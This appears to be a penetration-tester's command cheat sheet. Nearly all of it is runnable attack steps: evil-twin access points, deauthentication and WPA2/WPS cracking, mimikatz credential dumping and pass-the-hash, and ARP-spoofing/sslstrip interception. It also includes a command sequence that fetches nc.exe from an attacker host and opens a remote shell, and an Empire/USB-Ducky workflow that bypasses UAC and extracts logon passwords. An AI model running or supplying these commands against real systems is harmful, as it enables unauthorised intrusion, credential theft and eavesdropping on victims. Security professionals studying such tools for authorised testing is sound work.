Airbase-ng – Evil Twin

Check wifi interface

  • iwconfig

Turn up the power

  • iwconfig wlan0 txpower 27

Start wifi interface

  • airmon-ng start wlan0

Capture data & choose target AP

  • airodump-ng wlan0mon

Create Fake AP

  • airbase-ng wlan0mon -c 11 -a 20:34:67:24:89:76  -e FakeAP -v -z 2

Create Evil Twin AP

  • airbase-ng -a [victim AP MAC] -c 11-Z 4 --essid VictimAP wlan0mon

Monitor Evil Twin AP

  • airodump-ng --bssid [victim AP MAC] wlan0mon --channel 11 -w /root/Desktop/rougueap

Deauthentication

  • aireplay-ng -0 2 -a [router bssid] -c [Client MAC address] wlan0mon

Aircrack

  • aircrack-ng -b [victim AP MAC] -w /usr/share/wordlists/rockyou.txt rougue-01.cap

Custom wordlists

Using John

  • Download target site
    • # wget -r -l 2 www.<targetwebsite>.com
  • Produce uniq list
    • # grep -hr "" www.<targetwebsite>.com/ | tr '[:space:]' '\n' | sort | uniq > wordlist.lst
  • Clean list
    • # egrep -v '('\,'|'\;'|'\}'|'\{'|'\<'|'\>'|'\:'|'\='|'\"'|'\/'|'\/'|'\['|'\]')' wordlist.lst | sort -u > wordlist.clean.lst
  • Regenerate list w/ John
    • # john --wordlist=wordlist.clean.lst --rules --stdout | uniq > final.wordlist.lst

Using Crunch

Syntax: crunch <min> max<max> <characterset> -t <pattern> -o <output filename>

  • Letters and numbers mixed, minimum 8 max 8 letters
    • # crunch 8 8 -f /usr/share/rainbowcrack/charset.txt mixalpha -o /root/alphawordlist.lst
  • Password set to 10 char with the last four set to fixed &  first six to be variable
    • # crunch 10 10 -t @@@@@@0728 -o /root/birthdaywordlist.lst

WPA2 + Aircrack-ng

  1. Show wifi interfaces
    1. airmon-ng
    2. airmon-ng check kill ( If wifi interface doesn’t show up correctly)
  2. Start wifi interface
    1. airmon-ng start wlan0
  3. Scan for wifi networks
    1. airodump-ng wlan0mon
  4. Choose wifi to test
    1. ctrl+c to stop scanning
    2. # airodump-ng -c 11 --bssid [router bssid] -w /root/Desktop/wpa2handshake.cap mon0
    3. # airodump-ng --ignore-negative-one --bssid [router bssid] -c 11 -w /root/Desktop/wpa2handshake.cap mon0 (Alternative method)
  5. DeAuth clients on victim AP
    1. # aireplay-ng -0 2 -a [router bssid] -c 40:A6:D9:1F:4A:D3(Client MAC address) mon0
    2. Wait for handshake to be captured
  6. Crack handshake
    1. # aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

Create txt file remotely to get nc on victim host

  1. # str$(exec(“command.exe /c echo user [username] > ftp.txt”))
  2. # str$(exec(“command.exe /c echo pass [password] >> ftp.txt”))
  3. # str$(exec(“command.exe /c echo binary >> ftp.txt”))
  4. # str$(exec(“command.exe /c echo get nc.exe >> ftp.txt”))
  5. # str$(exec(“command.exe /c echo disconnect >> ftp.txt”))
  6. # str$(exec(“command.exe /c echo quit >> ftp.txt”))
  7. # str$(exec(“command.exe /c ftp -i -n -s:ftp.txt [IP OF ATTACKER PC”))
  8. # str$(exec(“nc -l -p 9999 -e command.exe”))

Empire + Ducky

1. Create listener 
1a. (Empire) > listeners
1b. (Empire: listeners) > set Name Listener01
1c. (Empire: listeners) > execute
1d. (Empire: listeners) > back
2. Create ducky payload
2a. (Empire) > agents
2b. (Empire: agents) > usestager ducky 
2c. (Empire: stager/ducky) > set listener Listener01
2d. (Empire: stager/ducky) > set Outfile /home/ducky.txt
2e. (Empire: stager/ducky) > generate
3. Put payload onto Ducky
3a. Generate inject.bin file from code in ducky.txt
at the Duck Toolkit site
3b. Copy inject.bin to Ducky
3c. Inject Ducky on victim
4. Try to extract login passwords from victim
4a. Wait for victim to connect back to Empire
4b. (Empire) > agents
4c. (Empire: agents) > list
4c. (Empire: agents) > interact FSDFSGAJ34FGH4
4d. (Empire: FSDFSGAJ34FGH4 ) > sysinfo
4e. (Empire: FSDFSGAJ34FGH4 ) > usemodule privesc/bypassuac
4f. (Empire: privesc/bypassuac ) > set Listener Listener01
4g. (Empire: privesc/bypassuac ) > run 
4h. (Empire: privesc/bypassuac ) > back * 2
4i. (Empire: agents) > list
4j. (Empire: agents) > interact DSGHFDFSGHJ243J
4k. (Empire: DSGHFDFSGHJ243J ) > usemodule credentials/
mimikatz/logonpasswords
4l. (Empire: credentials/mimikatz/logonpasswords ) > run

If succesful, logon passwords are now revealed in 
cleartext :)

Tor + proxychains + Kali

  1. Update Kali
    1. apt-get update
  2. Configure apt sources
    1. leafpad /etc/apt/sources.list
      1. add ‘deb http://deb.torproject.org/torproject.org wheezy main’
  3. Install Tor gpg keys
    1. gpg –keyserver keys.gnupg.net –recv 886DDD89
    2. gpg –export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add –
    3. apt-get update
    4. apt-get install deb.torproject.org-keyring
  4. Install Tor
    1. apt-get install tor
  5. Configure proxychains
    1. leafpad /etc/proxychains.conf
      1. uncomment ‘dynamic_chain’
      2. comment out ‘static_chain’
      3. add ‘socks5  127.0.0.1 9050’ at the end of the file
  6. Start Tor
    1. service tor start
  7. Execute proxychains
    1. proxychains nmap 1.2.3.4

Aircrack-ng + reaver + pixiewps

Prereqs:

  • Kali Linux
  • Do a “apt-get update && apt-get dist-upgrade -y” in your Kali Linux machine

1) Install reaver

r0ot@kali:~# apt-get install reaver aircrack-ng

2) Put your interface in monitor mode:

ro0t@kali:~# airmon-ng start wlan0

Note: You should now have a monitor interface named ‘wlan0mon

3) Identify AP in-scope for testing

ro0t@kali:~# airodump-ng wlan0mon –wps

Note: Identify in-scope AP mac address(BSSID) & channel it runs out of

4) Run reaver with gathered info 

roth@kali:~#  reaver -i wlan0mon -c 11 -b 12:34:56:78:90:12 -K 1

5) Behold pixiewps magic

You’re presented with WPS PSK wihin seconds, thanks Kali, reaver & pixiewps …that’s what a call an alliance of power

mimikatz

PASSWD

mimikatz # privilege::debug

mimikatz # sekurlsa::logonpasswords

Kerberos

mimikatz # sekurlsa::tickets /export

PassTheHash

mimikatz # sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:cc36cf7a8514893efccd332446158b1a

MiTM

1. Configure ip forwarding on attacker host

echo “1” > /proc/sys/net/ipv4/ip_forward

2. Redirection of http traffic to sslstrip
2a. iptables -t nat -A PREROUTING -i eth0 -p tcp –destination-port 80 -j REDIRECT –to-port 8000
2b. iptables-save

3. SSLStrip
sslstrip -k -l 8000 -w encrypted.txt

4. Ettercap
ettercap -TqM arp:remote <victim_ip> <gateway_ip>

5 Arpspoof
5a. Single host > arpspoof -i eth0 -t <victim_ip> <gateway_ip>
5b. Whole net > arpspoof -i eth0 <gateway_ip>

5. Urlsnarf – capture http
urlsnarf -i eth0

6. Driftnet – capture images
driftnet -i eth0

7. Dsniff – capture passwords
dsniff -i eth0 -w plaintext.txt

8. Mailsnarf – capture emails
mailsnarf -i eth0

nmap

Scan methodology

  1. Scan for live hosts

    1. nmap -sn -oA subnet_live 192.168.1.0/24
  2. Parse list w/ live hosts

    1. cat subnet_live.gnmap | awk ‘{print $2}’ > subnet_live_parsed
  3. Scan hosts for app ver. of top 500 ports

    1. nmap -sS -sV -O -min-parallelism 400 -max-parallelism 512 -script banner.nse,http-headers -top-ports 500 -iL subnet_live_parsed -oA subnet_live_top500
  4. Parse lists for top vuln. ports

    1. All found
      1. cat subnet_live_top500.gnmap | grep ’21/open\|22/open\|80/open\|81/open\|85/open\|88/open\|443/open\|1433/open\|3128/open\|3306/open\|5900/open\|8080/open’ | awk ‘{print $2}’ > subnet_live_top_vulnports
    2. FTP
      1. cat subnet_live_top500.gnmap | grep 21/open | awk ‘{print $2}’ > subnet_live_ftp
    3. SSH
      1. cat subnet_live_top500.gnmap | grep 22/open | awk ‘{print $2}’ > subnet_live_ssh
    4. MSSQL
      1. cat subnet_live_top500.gnmap | grep 1433/open | awk ‘{print $2}’ > subnet_live_mssql
    5. MYSQL
      1. cat subnet_live_top500.gnmap | grep 3306/open | awk ‘{print $2}’ > subnet_live_mysql
    6. VNC
      1. cat subnet_live_top500.gnmap | grep 5900/open | awk ‘{print $2}’ > subnet_live_vnc
    7. HTTP
      1. cat subnet_live_top500.gnmap | grep 80/open | awk ‘{print $2}’ > subnet_live_http

Metasploit scans of found hosts & their respective ports

  1. FTP scan :: msf > use auxiliary/scanner/ftp/ftp_login
  2. SSH scan :: msf > use auxiliary/scanner/ssh/ssh_login
  3. MSSQL scan :: msf > use auxiliary/scanner/mssql/mssql_login
  4. SNMP scan :: msf > use auxiliary/scanner/snmp/snmp_enum; snmp_login
  5. MYSQL scan :: msf > use auxiliary/scanner/mysql/mysql_login
  6. VNC scan :: msf > use auxiliary/scanner/vnc/vnc_login

Top Ports

nmap -sS -sV -O –min-parallelism 400 –max-parallelism 512 –script banner.nse,http-headers –top-ports 500 192.168.1.1

Search for BMC Vuln

nmap -p 49152 -n -oA ./bmc_vuln.txt –min-parallelism 512 –min-rate 400 -Pn 192.168.1.0/24

Search for MSSQL

  • nmap -sV -p T:1433 -n -oG ./scans/mssql_tcp_1433_scan.txt -Pn –min-parallelism 512 –min-rate 400 [ip_range]
  • nmap -p 1433 -oG ./scans/mssql_tcp_1433_scan.txt –script ms-sql-info –script-args mssql.instance-port=1433 –min-parallelism 512 –min-rate 400 [ip_range]

Web server enumeration
nmap -sV –script=http-enum [target_ip]

Check for vulns.
nmap –script=smb-check-vulns -p445 [target_ip]

dns-blacklist
nmap -sn [target_ip] –script=dns-blacklist

SQLi
nmap -T4 -A -v –script=sql-injection [target_ip]

Decoy scan
nmap -D RND:10 [target_ip]

nmap -D decoy1,decoy2,etc [target_ip]

Live hosts
nmap -sn [target_net]

Host scan
nmap -sS -Pn -n -PS [target_ip]

Host service scan
nmap -sS -Pn -n -A [target_ip]

Hosts down
nmap -v -sn -oG – target_ip | grep Down